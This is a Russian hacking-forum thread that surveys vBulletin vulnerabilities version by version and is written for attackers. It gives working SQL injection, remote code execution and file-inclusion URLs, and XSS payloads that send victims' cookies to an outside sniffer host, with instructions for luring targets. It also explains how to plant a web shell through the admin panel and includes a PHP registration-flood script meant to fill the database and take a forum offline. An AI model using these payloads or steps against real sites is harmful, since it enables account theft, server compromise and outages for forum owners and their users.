Форум АНТИЧАТ - [Обзор уязвимостей vBulletin]

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - [Обзор уязвимостей vBulletin] (https://forum.antichat.xyz/showthread.php?t=22852)

[Обзор уязвимостей vBulletin]

На форуме есть обзоры уязвимостей ipb и phpbb, я решил сделать обзор уязвимостей vBulletin-). Итак начну.
Рассмотрим уязвимости трёх веток воблы: 2.*.*, 3.0.* и 3.1.*.

Узнаём версию форума.

В папке /clientscript/ находятся несколко js и css файлов в которых можно посмотреть точную версию форума.

Код:

vbulletin_ajax_threadslist.js

vbulletin_ajax_namesugg.js

vbulletin_attachment.js

vbulletin_cpcolorpicker.js

vbulletin_editor.js

Пример:

Код:

www.xz.сom/forumpath/clientscript/vbulletin_editor.css

vBulletin 2

2.2.* - 2.2.4 - Выполнение произвольного кода
Описание уязвимости: уязвимость в vBulletin's Calendar PHP сценарии (calender.php) позволяет удаленному атакующему выполнять произвольный код в контексте пользователя 'nobody'.
Exploit: http://www.securitylab.ru/vulnerability/source/207147.php

2.3.* - SQL injection
Описанте уязвимости: уязвимость в проверке правильности входных данных в 'calendar.php'. Удаленный пользователь может внедрить произвольные SQL команды.
Пример:

Код:

www.xz.сom/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate

2.*.* - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки тэга email.
Exploit:

Код:

[E*MAIL]aaa@aaa.aa"'s='[/E*MAIL]' sss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.sss));

Video: http://video.antichat.ru/file57.html

vBulletin 3.0

3.0.0 - XSS
Описание уязвимости: уязвимость существует в сценарии search.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:

Код:

 www.xz.сom/forumpath//search.php?do=process&showposts=0&query=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

3.0-3.0.4 - Выполнение произвольных команд
Описание уязвимости: уязвимость существует в сценарии forumdisplay.php из-за некорректной обработки глобальных переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на системе.
Пример:

Код:

www.xz.сom/forumpath/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

О командах читать здесь: http://forum.antichat.ru/threadnav7345-1-10.html

3.0.3–3.0.9 XSS
Описание уязвимости: уязвимость существует при обработке входных данных в поле Статус. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примечание: менять свой статус по умолчанию может только администрация, начиная от группы Модераторы.
Пример:

Код:

<body onLoad=img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;>

3.0.9 and 3.5.4 - XSS
Описание уязвимости: звимость существует из-за недостаточной обработки входных данных в параметре posthash в сценарии newthread.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:

Код:

www.xz.сom/forumpath/newthread.php?do=newthread&f=3&subject=1234&WYSIWYG_HTML=%3Cp%3E%3C%2Fp%3E&s=&f=3&do=postthread&posthash=c8d3fe38b082b6d3381cbee17f1f1aca&poststarttime='%2Bimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%2B'&sbutton=%D1%EE%E7%E4%E0%F2%FC+%ED%EE%E2%F3%FE+%F2%E5%EC%F3&parseurl=1&disablesmilies=1&emailupdate=3&postpoll=yes&polloptions=1234&openclose=1&stickunstick=1&iconid=0

vBulletin 3.5

3.5.2 - XSS
Описание уязвимости: Уязвимость существует при обработке входных данных в поле "title" в сценарии "calendar.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:

Код:

TITLE:--------->Test<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

        BODY:---------->No matter

        OTHER OPTIONS:->No matter

Пояснение: заходим в календарь, жмём создать новое событие, и в заголовке прописываем <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>, смотрим ссылку на наше событие и впариваем её тому у кого хотим украсть cookie.

3.5.3 - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в поле "Email Address" в модуле "Edit Email & Password". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Примечание: удачная эксплуатация уязвимости возможна при включенных опциях "Enable Email features" и "Allow Users to Email Other Member".
Пример:

Код:

www.xz.сom/forumpath/profile.php?do=editpassword

        pass:your pass

        email: vashe@milo.com”><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.nomatt

        Note About lenght limitation 

        ****

        forum/profile.php?do=editoptions

        Receive Email from Other Members=yes

        ****

        www.xz.сom/forumpath/sendmessage.php?do=mailmember&u={your id}

Пояснение: заходим в профиль и в поле email прописываем vashe@milo.com”><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.nomatt. Cохраняем. Потом ставим в опциях свой емайл видимым для всех. Теперь втравливаем кому нибудь ссылку www.xz.сom/forumpath/sendmessage.php?do=mailmember&u={your id}, где {your id} ваш id. Cookie уйдут на снифер.

3.5.4 - Дамп БД
Описание уязвимости: уязвимость существует из-за недостаточного ограничения на доступ к сценарию upgrade_301.php в каталоге 'install'. Удаленный пользователь может с помощью специально сформированного URL сделать дамп базы данных приложения.
Пример:

Код:

www.xz.com/forumpath/install/upgrade_301.php?step=SomeWord

3.5.4 - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре url сценария inlinemod.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:

Код:

 www.xz.сom/forumpath/inlinemod.php?do=clearthread&url=lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a

Уязвимости в модулях vBulletin.

vBug Tracker 3.5.1 - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "sortorder" сценария vbugs.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:

Код:

www.xz.сom/forumpath/vbugs.php?do=list&s=&textsearch=&vbug_typeid=0&vbug_statusid=0&vbug_severityid=0&vbug_versionid=0&assignment=0&sortfield=lastedit&sortorder=%22%3Cscript%3Eimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%3C/script%3E

ImpEx 1.74 - PHP-инклюдинг и выполнение команд
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "systempath" в сценарии ImpExData.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:

Код:

(1)

www.xz.сom/forumpath/impex/ImpExData.php?systempath=http://rst.void.ru/download/r57shell.txt

www.xz.сom/forumpath/impex/ImpExData.php?systempath=../../../../../../../../etc/passwd

(2)

www.site.com/forum/impex/ImpExModule.php?systempath=http://www.host_evil.com/cmd?&=id

(3)

www.site.com/forum/impex/ImpExController.php?systempath=http://www.host_evil.com/cmd?&=id

(4)

www.site.com/forum/impex/ImpExDisplay.php?systempath=http://www.host_evil.com/cmd?&=id

Exploit: http://www.securitylab.ru/vulnerability/source/264410.php

ibProArcade 2.x - SQL injection
Описание уязвимости: Уязвимость существует в модуле “Report” при обработке входных данных в параметре user сценария index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
Пример:

Код:

www.xz.сom/forumpath/index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]

Где [any_user] id нужного нам юзера.

При использовании XSS c указанным в теме снифером. Логи смотреть тут: http://antichat.ru/sniff/log.php
Но лучше завести себе свой снифер -). Это можно сделать тут: http://antichat.ru/sniffer или тут: http://s.netsec.ru.

Шелл в vBulletin.

Разберёмся как залить шелл из админки воблы.

Способ заливки шелла в vBulletin 2.*.* и 3.0.*
1. Заходим в админку.
2. Смайлы.
3. Загрузить смайл.
4. Грузим наш шелл. (папка по умолчанию /images/smilies)
5. Заходим www.xz.сom/forumpath/images/smilies/shell.php
Примечание: сработает не везде.

Способ заливки шелла в vBulletin 3.5.*.
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда

Видео по теме:

http://video.antichat.ru/file105.html
http://video.antichat.ru/file95.html
http://video.antichat.ru/file57.html
http://video.antichat.ru/file3.html

З.Ы. Сильно не ругаться. Если где-то был не прав, исправляем, если что-то упустил, добавляем... Не стал вылаживать некоторые XSS т.к. версия форума у них повторяется...

Passive XSS vBulletin 3.6.x Admin Control Painel

еще дополнение:

Код:

Author: insanity

E-mail: insanity@darkers.com.br



XSS vBulletin 3.6.1 Admin Control Panel



http://www.exemplo.com/vbulletin/admincp/index.php?do=buildnavprefs&nojs=0&prefs="><script>alert("insanity")</script>

http://www.exemplo.com/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs="><script>alert("insanity")</script>

Backup SQL-Dump Bypass vBulletin 3.5.х

www.xz.com/forumpath/install/upgrade_301.php?step=backup

вот это не стесняйтесь смело подставлять ко всей линейке 3.5.х, особливо к 3.5.1, проверено.

Уязвимы особенно нуленые версии vBulletin

VBulletin 3.6.4 [FLASH] (SWF) XSS

VBulletin 3.6.4

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных при обработке входящих запросов. Атакующий может выполнить SWF произвольный сценарий и выкрасть данные аутентификации cookie.

Пример:

Код:

getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");

Информация по эксплуатации уязвимости описана ниже
http://forum.antichat.ru/showpost.php?p=558935&postcount=28

Active XSS TopXStats

В список "уязвимости модулей" не плохо было бы так же добавить дыру в моде TopXStats (Статистика Х лучших). Ее легко узнать - в низу форума есть таблица с послденимим затронутыми темами. лучшими авторами и .т.п, таблица так и называется "Статистика лучших".
Пару месяцев назад там нашли дыру - не было фильтрации выходных данных, вернее на выходе данные спокойно трансформировались в html
Достаточно создать тему в заголовке которой указать код редиректинга на свой сайт, и псевдодефейс готов. Через meta redirect например. Тогда с гл. страници пользователей будет перенаправлять на ваш дефейс.
Для дыры достаточно скоро был выложен патч на Vbulletin.net.ru , но не все его установили, и некоторые все еще ставят старую версию хака (не пропатченную). Так что флаг вам в руки.

Вместо meta redirect'a можно так же вставить сниффер, но поле "тема" имеет ограничение на кол-во символов, так что может не поместиться.

эксплоит для флуда форума

Вот прикольный эксплоит для флуда форума.
Конечно это не поможет при взломе. но всётаки достаточно серьёзный баг.

Код:

<?

set_time_limit(60);

//You can change 10 to other numbers  

for($i = 1 ; $i <= 10 ; $i++)

{

//to put curl to send POST request 

$ch = curl_init();

//change http://localhost/vb3 to the url of the script 

curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');

curl_setopt($ch , CURLOPT_POST , 1) ;

curl_setopt($ch , CURLOPT_POSTFIELDS , 'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&passwordconfirm=elmehdi&email=dicomdk'.$i.'@gmail.com&emailconfirm=dicomdk'.$i.'@gmail.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST corrections always on&options[showemail]=1');

curl_exec($ch);

curl_close($ch);

}

//Flood finished  good luck 

?>

Кстати видел данный эксплоит на перле, он реализован с помощю сокетов, работает гораздо быстрее (не показывает каждый раз форму регистрации), и соответственно кушает меньше трафика.

В принципе с помощю этого скрипта переполнить базу данных и остановить работу форума и даже сайта, т.к большинство хостеров ставят ограничение на обьём базы данных, достигнув который, в базу данных уже ничего нельзя будет записать, не почистив её.

Active XSS [attachment.php] vBulletin 3.x

Вот свеженький баг, сам не проверял.

Программа: vBulletin 3.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в поле формы «Extension» сценарием admincp/attachment.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Автор: semu
Дата: 08.02.2007 21:15:43

Чтобы юзать - должен быть доступ к админке, вобщем пригодиться конечно может в некоторых случаях.

XSRF vBulletin 3.0.0

Вот ещё для полноты темы:

Робит только vBulletin 3.0.0 Beta 2

Уязвимость в проверке правильности ввода обнаружена в vBulletin при просмотре честных сообщений. Удаленный пользователь может выполнить XSS нападение.

Сообщается, что сценарий private.php не фильтрует данные, представленные пользователем. Удаленный пользователь может сконструировать специально сформированную Web форму, которая, при загрузке в браузере пользователя, выполнить произвольный код сценария в браузере целевого пользователя в контексте vBulletin сайта. Пример: (требуется предварительная авторизация)

Код:

<html>

<body>

<form action="http://[victim]/forum/private.php" method="post" name="vbform">

<input type="hidden" name="do" value="insertpm" />

<input type="hidden" name="pmid" value="" />

<input type="hidden" name="forward" value="" />

<input type="hidden" name="receipt" value="0" />

<input type="text" class="bginput" name="title" value="" size="40" tabindex="2"/>

<textarea name="message" rows="20" cols="70" wrap="virtual" tabindex="3"></textarea>

<input type="submit" class="button" name="sbutton" value="Post Message" accesskey="s" tabindex="4" />

<input type="submit" class="button" value="Preview Message" access key="p" name="preview" onclick="this.form.dopreview = true; return true;this.form.submit()" tabindex="5">

<input type="checkbox" name="savecopy" value="1" id="cb_savecopy" checked="checked"/> 

<input type="checkbox" name="signature" value="1" id="cb_signature" />

<input type="checkbox" name="parseurl" value="1" id="cb_parse url" checked="checked" />

<input type="checkbox" name="disablesmilies" value="1" id="cb_disablesmilies" />

</form>

<script>

//Set Values and Submit

// You can write your own JS codes

var xss = "\"><script>alert(document.cookie)<\/script>";

document.vbform.title.value=xss;

document.vbform.preview.click();

</script>

</body>

</html>

Уязвимость обнаружена в vBulletin 3.0.0 Beta 2.

Code EXEC vBulletin 3.0.6

Помойму этого тоже не было ,если не ошибаюсь:

Программа: vBulletin 3.0.6 и более ранние версии

Уязвимость позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе с привилегиями web-сервера. Уязвимость существует при обработке имен шаблонов в сценарии 'misc.php' при включенной опции 'Add Template Name in HTML Comments' (не является значением по умолчанию). Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный код на системе.

Пример:

Код:

http://[target]/misc.php?do=page&template={${phpinfo()}}

Этот и предыдущий пост хорошо-бы перенести в начало темы, к ранним версиям воблы.

vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege

vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege (Требуются привилегии супермодератора)
http://milw0rm.com/exploits/3387

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «postids» сценарием inlinemod.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

http://www.xakep.ru/post/36982/default.asp